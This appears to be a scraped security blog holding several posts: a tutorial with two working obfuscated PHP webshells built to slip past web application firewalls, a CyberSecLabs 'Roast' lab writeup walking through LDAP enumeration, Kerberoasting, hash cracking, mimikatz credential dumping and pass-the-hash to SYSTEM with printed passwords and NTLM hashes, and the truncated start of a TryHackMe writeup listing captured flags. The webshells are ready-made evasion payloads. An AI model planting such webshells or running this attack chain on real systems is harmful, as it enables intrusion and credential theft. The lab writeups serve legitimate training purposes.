bypass-waf-php-webshell-without-numbers-letters

[Bypass WAF] Php webshell without numbers and letters

For bypass WAF, you can use some techniques to re-write your webshell.

Idea

First, clear ideas. My core idea is to non-letter, the characters of the characters through a variety of changes, and finally construct any az in the characters. And then use PHP to allow dynamic functions to perform the characteristics of splicing a function name, such as “assert”, and then the dynamic implementation of the.

So, the transformation method will be the main point to solve this problem.

But before that, I need to talk about the difference between php5 and 7.

Php5 assert is a function, we can use $f='assert';$f(...);this method to dynamically execute arbitrary code.

But php7, assert is no longer a function, into a language structure (similar to eval), can not be used as a function name dynamic implementation of the code, so use a little more complicated. But there is no need to worry too much, for example, we use the file_put_contents function, the same can be used to gethell.

For the sake of convenience, use PHP5 as the environment, PHP7 related to the use of their own way to explore it.

Method 1

This is the easiest and easiest way to think about it. In PHP, the two strings after the implementation of XOR operation, or a string. So, we want to get a letter in az, to find a two non-letter, the number of characters, their XOR results can be the letter.

Get the following results:

<?php
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert';
$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';
$___=$$__;
$_($___[_]); // assert($_POST[_]);

The results are as follows:

Method 2

Using PHP a little skill, look at the document: http://php.net/manual/en/language.operators.increment.php

PHP follows Perl’s convention when dealing with arithmetic operations on character variables and not C’s. For example, in PHP and Perl $a = ‘Z’; $a++; turns $a into ‘AA’, while in C a = ‘Z’; a++; turns a into ‘[‘ (ASCII value of ‘Z’ is 90, ASCII value of ‘[‘ is 91). Note that character variables can be incremented but not decremented and even so only plain ASCII alphabets and digits (a-z, A-Z and 0-9) are supported. Incrementing/decrementing other character variables has no effect, the original string is unchanged.

So, how to get a variable for the string ‘a’?

Coarse, the first letter of the array (Array) is capitalized A, and the fourth letter is lowercase a. In other words, we can get both lowercase and capitalized A, which means that we can get az and AZ all the letters.

In PHP, if you want to join arrays and strings, the array will be converted to a string whose value is Array:

And then take the first letter of the string, you can get ‘A’.

Using this technique, I wrote the following webshell (because the PHP function is case insensitive, so we end up doing it ASSERT($_POST[_]):

<?php
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E 
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;
 
$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;
 
$_=$$____;
$___($_[_]); // ASSERT($_POST[_]);

@ not allowed , but not needed 😉 , it just avoids errors but the execution follows on [ setting @ or not ]

Protected: htb-omni-nl

This content is password protected. To view it please enter your password below:

Posted on

Protected: htb-laser-nl

This content is password protected. To view it please enter your password below:

Posted on

Protected: htb-walker-nl

This content is password protected. To view it please enter your password below:

Posted on

csl-roast-nl

CyberSecLabs – Roast writeup

https://www.cyberseclabs.co.uk/labs/challenge-labs/all

As always we start with a nmap scan

kali@kali:/opt/evil-winrm$ nmap -Pn -vv -A 172.31.3.2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 08:06 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 08:06
Completed Parallel DNS resolution of 1 host. at 08:06, 0.00s elapsed
Initiating Connect Scan at 08:06
Scanning 172.31.3.2 [1000 ports]
Discovered open port 53/tcp on 172.31.3.2
Discovered open port 139/tcp on 172.31.3.2
Discovered open port 445/tcp on 172.31.3.2
Discovered open port 135/tcp on 172.31.3.2
Discovered open port 3389/tcp on 172.31.3.2
Discovered open port 636/tcp on 172.31.3.2
Discovered open port 3269/tcp on 172.31.3.2
Discovered open port 593/tcp on 172.31.3.2
Discovered open port 3268/tcp on 172.31.3.2
Discovered open port 464/tcp on 172.31.3.2
Discovered open port 88/tcp on 172.31.3.2
Discovered open port 389/tcp on 172.31.3.2
Completed Connect Scan at 08:06, 6.49s elapsed (1000 total ports)
Initiating Service scan at 08:06
kali@kali:/opt$ nmap -Pn -sV --script "ldap* and not brute*" -p 389 172.31.3.2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-17 08:51 EDT
Nmap scan report for 172.31.3.2
Host is up (0.10s latency).

PORT STATE SERVICE VERSION
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: roast.csl, Site: Default-First-Site-Name)
| ldap-brute:
| root:<empty> => Valid credentials
| admin:<empty> => Valid credentials
| administrator:<empty> => Valid credentials
| webadmin:<empty> => Valid credentials
| sysadmin:<empty> => Valid credentials
| netadmin:<empty> => Valid credentials
| guest:<empty> => Valid credentials
| user:<empty> => Valid credentials
| web:<empty> => Valid credentials
|_ test:<empty> => Valid credentials
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=roast,DC=csl
| ldapServiceName: roast.csl:roast$@ROAST.CSL
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedControl: 1.2.840.113556.1.4.2090
| supportedControl: 1.2.840.113556.1.4.2205
| supportedControl: 1.2.840.113556.1.4.2204
| supportedControl: 1.2.840.113556.1.4.2206
| supportedControl: 1.2.840.113556.1.4.2211
| supportedControl: 1.2.840.113556.1.4.2239
| supportedControl: 1.2.840.113556.1.4.2255
| supportedControl: 1.2.840.113556.1.4.2256
| supportedControl: 1.2.840.113556.1.4.2309
| supportedControl: 1.2.840.113556.1.4.2330
| supportedControl: 1.2.840.113556.1.4.2354
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=roast,DC=csl
| serverName: CN=ROAST,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=roast,DC=csl
| schemaNamingContext: CN=Schema,CN=Configuration,DC=roast,DC=csl
| namingContexts: DC=roast,DC=csl
| namingContexts: CN=Configuration,DC=roast,DC=csl
| namingContexts: CN=Schema,CN=Configuration,DC=roast,DC=csl
| namingContexts: DC=DomainDnsZones,DC=roast,DC=csl
| namingContexts: DC=ForestDnsZones,DC=roast,DC=csl
| isSynchronized: TRUE
| highestCommittedUSN: 86066
| dsServiceName: CN=NTDS Settings,CN=ROAST,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=roast,DC=csl
| dnsHostName: Roast.roast.csl
| defaultNamingContext: DC=roast,DC=csl
| currentTime: 20200817125113.0Z
|_ configurationNamingContext: CN=Configuration,DC=roast,DC=csl
| ldap-search:
| Context: DC=roast,DC=csl
| dn: DC=roast,DC=csl
| dn: CN=David Smith,OU=Roast,DC=roast,DC=csl
| objectClass: top
| objectClass: person
| objectClass: organizationalPerson
| objectClass: user
| cn: David Smith
| sn: Smith
| description: Your Password is WelcomeToR04st
| givenName: David
| distinguishedName: CN=David Smith,OU=Roast,DC=roast,DC=csl
| instanceType: 4
| whenCreated: 2020/05/15 06:30:43 UTC
| whenChanged: 2020/05/15 21:42:47 UTC
| displayName: David Smith
| uSNCreated: 16572
| uSNChanged: 32799
| name: David Smith
| objectGUID: 95a9772-f36-7344-9cc1-53d257cf635e
| userAccountControl: 66048
| badPwdCount: 0
| codePage: 0
| countryCode: 0
| badPasswordTime: 2020-05-16T01:47:26+00:00
| lastLogoff: 0
| lastLogon: 2020-05-18T02:48:58+00:00
| logonHours: \xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF
| pwdLastSet: 2020-05-16T01:46:13+00:00
| primaryGroupID: 513
| objectSid: 1-5-21-4133422454-1522376082-951199702-1103
| accountExpires: Never
| logonCount: 1
| sAMAccountName: dsmith
| sAMAccountType: 805306368
| userPrincipalName: dsmith@roast.csl
| objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=roast,DC=csl
| dSCorePropagationData: 2020/05/15 06:46:18 UTC
| dSCorePropagationData: 2020/05/15 06:38:02 UTC
| dSCorePropagationData: 1601/01/01 00:00:00 UTC
| lastLogonTimestamp: 2020-05-16T01:48:13+00:00
| dn: CN=Cody Rhodes,OU=Roast,DC=roast,DC=csl
| objectClass: top
| objectClass: person
| objectClass: organizationalPerson
| objectClass: user
| cn: Cody Rhodes
| sn: Rhodes
| givenName: Cody
| distinguishedName: CN=Cody Rhodes,OU=Roast,DC=roast,DC=csl
| instanceType: 4
| whenCreated: 2020/05/15 06:34:11 UTC
| whenChanged: 2020/05/15 21:41:51 UTC
| displayName: Cody Rhodes
| uSNCreated: 16605
| memberOf: CN=Remote Management Users,CN=Builtin,DC=roast,DC=csl
| uSNChanged: 32794
| name: Cody Rhodes
| objectGUID: 264ab96b-32e6-7f47-9f71-45b9eae6ee8
| userAccountControl: 66048
| badPwdCount: 0
| codePage: 0
| countryCode: 0
| badPasswordTime: 2020-05-16T01:47:26+00:00
| lastLogoff: 0
| lastLogon: 2020-05-16T01:58:03+00:00
| logonHours: \xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF
| pwdLastSet: 2020-05-16T01:47:17+00:00
| primaryGroupID: 513
| objectSid: 1-5-21-4133422454-1522376082-951199702-1104
| accountExpires: Never
| logonCount: 2
| sAMAccountName: crhodes
| sAMAccountType: 805306368
| userPrincipalName: crhodes@roast.csl
| objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=roast,DC=csl
| dSCorePropagationData: 2020/05/15 06:46:18 UTC
| dSCorePropagationData: 2020/05/15 06:37:46 UTC
| dSCorePropagationData: 1601/01/01 00:00:00 UTC
| lastLogonTimestamp: 2020-05-15T10:54:23+00:00
| dn: CN=Steve Smith,OU=Roast,DC=roast,DC=csl
| objectClass: top
| objectClass: person
| objectClass: organizationalPerson
| objectClass: user
| cn: Steve Smith
| sn: Smith
| givenName: Steve
| distinguishedName: CN=Steve Smith,OU=Roast,DC=roast,DC=csl
| instanceType: 4
| whenCreated: 2020/05/15 06:35:06 UTC
| whenChanged: 2020/05/15 06:38:17 UTC
| displayName: Steve Smith
| uSNCreated: 16612
| uSNChanged: 16629
| name: Steve Smith
| objectGUID: 66dc74ae-c214-4e42-94e3-44092523e22
| userAccountControl: 66048
| badPwdCount: 2
| codePage: 0
| countryCode: 0
| badPasswordTime: 2020-05-16T01:47:26+00:00
| lastLogoff: 0
| lastLogon: Never
| pwdLastSet: 2020-05-15T10:40:32+00:00
| primaryGroupID: 513
| objectSid: 1-5-21-4133422454-1522376082-951199702-1105
| accountExpires: 30828-09-14T06:53:31+00:00
| logonCount: 0
| sAMAccountName: ssmith
| sAMAccountType: 805306368
| userPrincipalName: ssmith@roast.csl
| objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=roast,DC=csl
| dSCorePropagationData: 2020/05/15 06:46:18 UTC
| dSCorePropagationData: 2020/05/15 06:38:17 UTC
| dSCorePropagationData: 1601/01/01 00:00:00 UTC
|_ dn: CN=Roast Svc,OU=Roast,DC=roast,DC=csl
Service Info: Host: ROAST; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.48 seconds
kali@kali:/opt$

We make sure we have the latest impacket installed

kali@kali:/opt$ sudo git-clone https://github.com/SecureAuthCorp/impacket.git
sudo: git-clone: command not found
kali@kali:/opt$ sudo git clone https://github.com/SecureAuthCorp/impacket.git
Cloning into 'impacket'...
remote: Enumerating objects: 18128, done.
remote: Total 18128 (delta 0), reused 0 (delta 0), pack-reused 18128
Receiving objects: 100% (18128/18128), 5.97 MiB | 4.64 MiB/s, done.
Resolving deltas: 100% (13833/13833), done.
kali@kali:/opt$ cd impacket/
kali@kali:/opt/impacket$ pip3 install .

.

kali@kali:/opt/impacket$ crackmapexec smb 172.31.3.2 -u dsmith -p WelcomeToR04st
SMB 172.31.3.2 445 ROAST [*] Windows 10.0 Build 17763 (name:ROAST) (domain:roast.csl) (signing:True) (SMBv1:False)
SMB 172.31.3.2 445 ROAST [+] roast.csl\dsmith:WelcomeToR04st
kali@kali:/opt/evil-winrm$ crackmapexec smb 172.31.3.2 -u dsmith -p WelcomeToR04st --shares
SMB 172.31.3.2 445 ROAST [*] Windows 10.0 Build 17763 (name:ROAST) (domain:roast.csl) (signing:True) (SMBv1:False)
SMB 172.31.3.2 445 ROAST [+] roast.csl\dsmith:WelcomeToR04st
SMB 172.31.3.2 445 ROAST [+] Enumerated shares
SMB 172.31.3.2 445 ROAST Share Permissions Remark
SMB 172.31.3.2 445 ROAST ----- ----------- ------
SMB 172.31.3.2 445 ROAST ADMIN$ Remote Admin
SMB 172.31.3.2 445 ROAST C$ Default share
SMB 172.31.3.2 445 ROAST IPC$ READ Remote IPC
SMB 172.31.3.2 445 ROAST NETLOGON READ Logon server share
SMB 172.31.3.2 445 ROAST SYSVOL READ Logon server share
kali@kali:/opt/evil-winrm$
kali@kali:/opt/impacket$ crackmapexec winrm 172.31.3.2 -u dsmith -p WelcomeToR04st
WINRM 172.31.3.2 5985 ROAST [*] http://172.31.3.2:5985/wsman
WINRM 172.31.3.2 5985 ROAST [-] ROAST0\dsmith:WelcomeToR04st "Failed to authenticate the user dsmith with ntlm"
kali@kali:/tmp$ GetUserSPNs.py -request -dc-ip 172.31.3.2 roast.csl/crhodes -outputfile hashes.kerberoast
Impacket v0.9.22.dev1+20200813.221956.1c893884 - Copyright 2020 SecureAuth Corporation

Password:WelcomeToR04st
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- -------- ----------------------------------------------------- -------------------------- --------- ----------
roast/ROAST roastsvc CN=Remote Management Users,CN=Builtin,DC=roast,DC=csl 2020-05-15 02:35:50.302845 <never>
kali@kali:/tmp$ cat hashes.kerberoast
$krb5tgs$23$*roastsvc$ROAST.CSL$roast/ROAST*$a06f00e18dbcc60631026290cd49c8c8$e208b8bb3a69789d214c8901dca6502f2f4136ffa72a47e15c7b3ae887f7494a7b4a2850f1dc51c40b40ac503dbe6c9f6008970a61472611e899705dfbc9c7155f48d129a838264ab8a8a271ee2c5ccd7dab4928e37f12fa8b5e3d6539e4267774b2ce663cdaa8098155c027a6a991cf9b3c3372058da235589a6f1a28b0fcbd3fe715815439efc9979c1cc0bd1cf23f9eb3b9664613f34c91cc18f5325b575586f8b5ab03331bd95bf705e26ba40f0405a4524bc084d6c54c0283a3ddadacac71fe1a3793f7f8592f6f8bf1bddd74859e4c55635dd65419a4e944821696f7437b95f3622a1aeb3dc479b9d1ae73f61590c4b4db1ddff44d1674021a0a86518fafd937a28a43ef017af965322dd0ec2f32a59f7ec699ca2457663c9e82d76c2446363902d27598fa5ba591734d7eaba9e16d599558025244eb68854e94ef3a05bae3e4deaeaf757a7ef567e3824a8b49a40f7b4bb34b5f5bc43956e67726f55dd16a2bbbc70109e059e9f049393e20f36bda7ceb2a7c33dc563583f2447d75b1abdbb2bfb9dcf6cc045b31d93c8c7fdb3cd4f6eabe3cab80c9943c9e6bfdc0c18ff7abc93b9a5239116ff6f81b9edf2ef42b164bb6c27edf0916437f9bbe3452f634324aa4e6ff934658e6acd04b711259dd9e91d82775f79b143047b694d4cf9ba997c39f176aebe259825916494662e1e2b0a2b0eb7d208d4b9dd288d40d60823234fa686941de759bb48c71f768f025447c52fe37e7132c47f5b71ea9d474cc9a1fd892d2ad510eb0446a5354cd785f6770b1c0e4e76af40c2c37f1cc7ea579c421ede4ecf63d640f39763eaa2557ad904d43d9008169563d05870e9488a2b1e6d6c50c755440f3a4c477aebfad5e401ef6684be7ddba7857d271b45e69dc3992807efb68aa44afefe003481121d004b4cda9c4d5b77d72c7018698bd10d9b3be762f2c0a21e424a75a40967b46dcad23862c9b76ccea70fa28260d6e86c2489b58e97bfa61d6ad4a3cca99c296ca3bef63963ca29db7658690ba9587f060868132a291065b4b3abca17c1f50260eb6dcf82a0994d584626c4358e2f81c28382e1a1310fc36c88a4f7e6c809035e3b2427f6a202c55294f261023f2ef25f05721c2c3e307ccd1dd7496e2fa9720fa35ddbdf752a21b16871367960c130538278731484cef2b8d37aec73ebf38da421a1fe96626132b42dc072e80236dbf9396f40af9a20622de811529ab3b54deeb1af3d974c77ea4eadfa5ac6b9f7eb2d0782edd5ffd706e760869e11d4c1b2540f2d7f74f7f3bbc3a65
kali@kali:/tmp$
kali@kali:/tmp$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes.kerberoast
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!!!watermelon245 (?)
1g 0:00:00:25 DONE (2020-08-18 05:25) 0.03957g/s 567616p/s 567616c/s 567616C/s !!12Honey.. 0860776252
Use the "--show" option to display all of the cracked passwords reliably
Session completed
kali@kali:/tmp$
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u roastsvc -p '!!!watermelon245'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\roastsvc\Documents>
kali@kali:/opt/evil-winrm$ crackmapexec winrm 172.31.3.2 -u crhodes -p WelcomeToR04st
WINRM 172.31.3.2 5985 ROAST [*] http://172.31.3.2:5985/wsman
WINRM 172.31.3.2 5985 ROAST [+] ROAST0\crhodes:WelcomeToR04st (Pwn3d!)
kali@kali:/opt/evil-winrm$
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u crhodes -p 'WelcomeToR04st'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\crhodes\Documents> cd c:\puck

*Evil-WinRM* PS C:\puck> upload /opt/Bloodhound/Ingestors/Sharphound.exe
Info: Uploading /opt/Bloodhound/Ingestors/Sharphound.exe to C:\puck\Sharphound.exe


Data: 1110016 bytes of 1110016 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\puck> upload /opt/Bloodhound/Ingestors/Sharphound.ps1
Info: Uploading /opt/Bloodhound/Ingestors/Sharphound.ps1 to C:\puck\Sharphound.ps1


Data: 1297764 bytes of 1297764 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\puck> dir


Directory: C:\puck


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/18/2020 3:42 AM 832512 Sharphound.exe
-a---- 8/18/2020 3:42 AM 973323 Sharphound.ps1


*Evil-WinRM* PS C:\puck> ./Sharphound.exe
-----------------------------------------------
Initializing SharpHound at 3:42 AM on 8/18/2020
-----------------------------------------------

Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain ROAST.CSL using path CN=Schema,CN=Configuration,DC=ROAST,DC=CSL
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM
Status: 61 objects finished (+61 61)/s -- Using 26 MB RAM
Enumeration finished in 00:00:01.8335102
Compressing data to .\20200818034254_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 3:42 AM on 8/18/2020! Happy Graphing!

*Evil-WinRM* PS C:\puck> dir


Directory: C:\puck


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/18/2020 3:42 AM 8935 20200818034254_BloodHound.zip
-a---- 8/18/2020 3:42 AM 832512 Sharphound.exe
-a---- 8/18/2020 3:42 AM 973323 Sharphound.ps1
-a---- 8/18/2020 3:42 AM 10118 ZDU2MDE4M2MtOTJlZC00MTRlLWFhMmEtOGJlM2E2ODA4ZjUy.bin
*Evil-WinRM* PS C:\puck>
*Evil-WinRM* PS C:\puck> download 20200819234325_BloodHound.zip /tmp/20200819234325_BloodHound.zip
Info: Downloading C:\puck\20200819234325_BloodHound.zip to /tmp/20200819234325_BloodHound.zip

Info: Download successful!
*Evil-WinRM* PS C:\puck>

 

net group “domain admins” roastsvc /add

*Evil-WinRM* PS C:\users\roastsvc\Documents> ./mimikatz.exe "privilege:debug" "lsadump::lsa /patch" "exit"

.#####. mimikatz 2.2.0 (x64) #18362 May 2 2020 16:23:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz(commandline) # privilege:debug
ERROR mimikatz_doLocal ; "privilege:debug" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz
cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # lsadump::lsa /patch
Domain : ROAST0 / S-1-5-21-4133422454-1522376082-951199702

RID : 000001f4 (500)
User : Administrator
LM :
NTLM : f6861a8cfc1c3b9f3ff39a8adb6bd388

RID : 000001f5 (501)
User : Guest
LM :
NTLM :

RID : 000001f6 (502)
User : krbtgt
LM :
NTLM : 016e928748d559770ee5fe3028baf718

RID : 0000044f (1103)
User : dsmith
LM :
NTLM : a0a8160111b21d48d2e816f4cc8da053

RID : 00000450 (1104)
User : crhodes
LM :
NTLM : a0a8160111b21d48d2e816f4cc8da053

RID : 00000451 (1105)
User : ssmith
LM :
NTLM : 23991f3cd665b0bc1f7cccfd62506161

RID : 00000452 (1106)
User : roastsvc
LM :
NTLM : 2f77331cfd7b2142b3a86a7d2ce7e824

RID : 000003e8 (1000)
User : ROAST$
LM :
NTLM : 0db85ab8c8395c6c1333a4e9e90ae400

mimikatz(commandline) # exit
Bye!
*Evil-WinRM* PS C:\users\roastsvc\Documents>
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u Administrator -H f6861a8cfc1c3b9f3ff39a8adb6bd388

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>

.

kali@kali:/opt/evil-winrm$ psexec.py -hashes f6861a8cfc1c3b9f3ff39a8adb6bd388:f6861a8cfc1c3b9f3ff39a8adb6bd388 administrator@172.31.3.2
Impacket v0.9.22.dev1+20200813.221956.1c893884 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 172.31.3.2.....
[*] Found writable share ADMIN$
[*] Uploading file EqimrmMk.exe
[*] Opening SVCManager on 172.31.3.2.....
[*] Creating service Plxk on 172.31.3.2.....
[*] Starting service Plxk.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
Roast

C:\Windows\system32>

.

kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u Administrator -H f6861a8cfc1c3b9f3ff39a8adb6bd388

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
Roast
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\desktop> type system.txt.txt
9d91f887b78d82444a5af8bbd0d115db


*Evil-WinRM* PS C:\Users\Get-ChildItem -Path C:\Users -Filter *.txt.txt -Recurse -ErrorAction SilentlyContinue -Force
*Evil-WinRM* PS C:\Users\Administrator\desktop> type system.txt.txt
9d91f887b78d82444a5af8bbd0d115db
*Evil-WinRM* PS C:\Users> type C:\Users\roastsvc\Desktop\access.txt
0042894e0a6b2bc2c4517c5f7ccc5c16

.

 

https://m.twitch.tv/videos/708116376

Author : Puckiestyle

 

thm-pythonplayground-nl

Featured image

 Tasks

Active Machine Information
Title

Python Playground v2

IP Address

10.10.1.16

Expires

1h 03m 33s

 
100%

Jump in and grab those flags! They can all be found in the usual places (/home/someuser and /root).


#1 What is flag 1?
THM{7e0b5cf043975e3c104a458a8d4f6f2f}
THM{69a36d6f9da10d23ca0dbfdf6e691ec5}
#2 What is flag 2?
THM{69a36d6f9da10d23ca0dbfdf6e691ec5}
#3 What is flag 3?
THM{be3adc69c25ad14eb79da4eb57925ad1}

I started with nmap scan.

nmap -T4 -p- -A 10.10.1.16
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-09 21:31 IST
Nmap scan report for 10.10.79.248
Host is up (0.25s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f4:af:2f:f0:42:8a:b5:66:61:3e:73:d8:0d:2e:1c:7f (RSA)
|   256 36:f0:f3:aa:6b:e3:b9:21:c8:88:bd:8d:1c:aa:e2:cd (ECDSA)
|_  256 54:7e:3f:a9:17:da:63:f2:a2:ee:5c:60:7d:29:12:55 (ED25519)
80/tcp open  http    Node.js Express framework
|_http-title: Python Playground!
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
